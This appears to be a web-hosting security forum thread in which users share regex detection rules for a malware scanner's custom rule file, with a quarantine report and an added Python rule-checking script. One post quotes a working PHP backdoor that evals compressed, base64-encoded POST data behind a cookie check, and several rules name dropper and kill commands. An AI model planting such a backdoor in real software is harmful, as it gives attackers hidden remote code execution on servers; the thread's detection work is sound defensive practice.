STICKY rules for CXS.XTRA regs.
Re: STICKY rules for CXS.XTRA regs.
Don't work regall:yahoo\.Com:68\.142\.202\.247
Re: STICKY rules for CXS.XTRA regs.
I have tried and it is working:
mobileappsgallery wrote: Don't work regall:yahoo\.Com:68\.142\.202\.247
As you can see, I have tried with two rules and both worked.
Quarantine date: Mon Jun 25 08:37:51 2012
Quarantine file: /quarantine/ftp/owner/cxstest.php.1340631471_1
Quarantine file size: 67 bytes
Original file: /home/owner/public_html/cxstest.php
File owner: owner
FTP Account: owner
FTP IP address: xx.xx.xx.xx
md5sum: 4163ca7b518066623fe073cfd52650b4
Reason:
Regular expression match = [yahoo\.com\:68\.142\.202\.247]
Regular expression match = [yahoo\.Com:68\.142\.202\.247]
Sergio
Re: STICKY rules for CXS.XTRA regs.
So, is no one updating this sticky list anymore???
It's been 6 months since the last update, and I know more strings exist that could be inserted here.
Re: STICKY rules for CXS.XTRA regs.
Hello Peterelsner,
if you can contribute, I am more than glad to add any string that you can provide.
I have not posted anymore because by now my servers have not got any attacks with different rules to the ones that I have or the ones that CXS includes.
If you can help, it will be great.
Regards,
Sergio
Re: STICKY rules for CXS.XTRA regs.
Found a new one that you may want to add. Over the weekend had no less than 150 messages that various gif/jpg/php files were uploaded that had suspicious data in it. They were marked as suspicious only and not quarantined.
Added this to my cxs.xtra file:
regall:quarantine:\$_POST\[\(chr\(112\)\.chr\(49\)\)
Then ran scan on those 4 or 5 users that had the most hits...
result was:
w1655179n.php.1369756806_1) Regular expression match = [\$_POST\[\(chr\(112\)\.chr\(49\)\)] (md5sum:254e27d2d8854a6bc9f9a760f4c52a15)
(dozens of others too). But now they got quarantined.
Re: STICKY rules for CXS.XTRA regs.
Thank you, Peter.
I am adding this to the sticky.
Regards,
Sergio
Re: STICKY rules for CXS.XTRA regs.
Another one that came up last night:
regall:quarantine:second stage dropper
regall:quarantine:killall -9
Re: STICKY rules for CXS.XTRA regs.
Thank you, qchost, I have added these to the sticky.
Regards,
Sergio
Re: STICKY rules for CXS.XTRA regs.
Hi all,
Could somebody please help me create a regex for this. I have found it in a couple of sites, and they use it to alter .js files.
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){echo '<textarea id=areatext>';eval($msg);echo '</textarea>bg';exit;}} exit;
Regards,
Dieter
Re: STICKY rules for CXS.XTRA regs.
The sticky is only for regex that CXS users donate to the forum and not to ask for the creation of one, for this only time, I am generating a regex for you, but please if you need help open a new thread asking for it.
On the other hand, please read thread viewtopic.php?f=26&t=7341#p21404 that is about .JS files.
regall:quarantine:\$msg\=@gzinflate\(@base64_decode\(@str_replace
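As an added example (not from this thread and not CXS's own code), a small Python checker that reads rule lines in the `regall:` / `regall:quarantine:` shape posted in this thread and runs them over constructed sample file contents, so a donated rule such as the gzinflate one above can be confirmed to match before it goes into cxs.xtra. How the rule line is split is an assumption based only on the rule shapes shown here, not on CXS's real parser.

```python
import re
from typing import NamedTuple

# Constructed rule set in the shape shown in this thread (assumption: "regall:"
# may be followed by a "quarantine:" flag, the remainder is a Perl-style regex).
RULES = r"""
regall:quarantine:\$_POST\[\(chr\(112\)\.chr\(49\)\)
regall:quarantine:second stage dropper
regall:quarantine:killall -9
regall:quarantine:\$msg\=@gzinflate\(@base64_decode\(@str_replace
regall:yahoo\.com\:68\.142\.202\.247
"""

# Constructed sample file contents: two hits, one benign file, one suspicious-only hit.
SAMPLE_FILES = {
    "w1655179n.php": "<?php $k = $_POST[(chr(112).chr(49))]; ?>",
    "script.js": "$msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))",
    "index.php": "<?php echo 'hello'; ?>",
    "notes.txt": "contact: yahoo.com:68.142.202.247",
}


class Rule(NamedTuple):
    quarantine: bool      # True -> file would be quarantined, False -> reported as suspicious
    pattern: re.Pattern


def parse_rules(text: str) -> list:
    """Parse regall rule lines; only the first ':' separates the rule type, so a ':'
    inside the regex (as in the yahoo rule) is kept as part of the pattern."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        kind, _, rest = line.partition(":")
        if kind != "regall":
            continue  # other cxs.xtra rule types are out of scope for this checker
        quarantine = rest.startswith("quarantine:")
        if quarantine:
            rest = rest[len("quarantine:"):]
        rules.append(Rule(quarantine, re.compile(rest)))
    return rules


def scan(files: dict, rules: list) -> dict:
    """Return {filename: [(action, pattern), ...]}, one entry per matching rule,
    mirroring the 'Regular expression match = [...]' lines in a cxs report."""
    hits = {}
    for name, content in files.items():
        for rule in rules:
            if rule.pattern.search(content):
                action = "quarantine" if rule.quarantine else "suspicious"
                hits.setdefault(name, []).append((action, rule.pattern.pattern))
    return hits
```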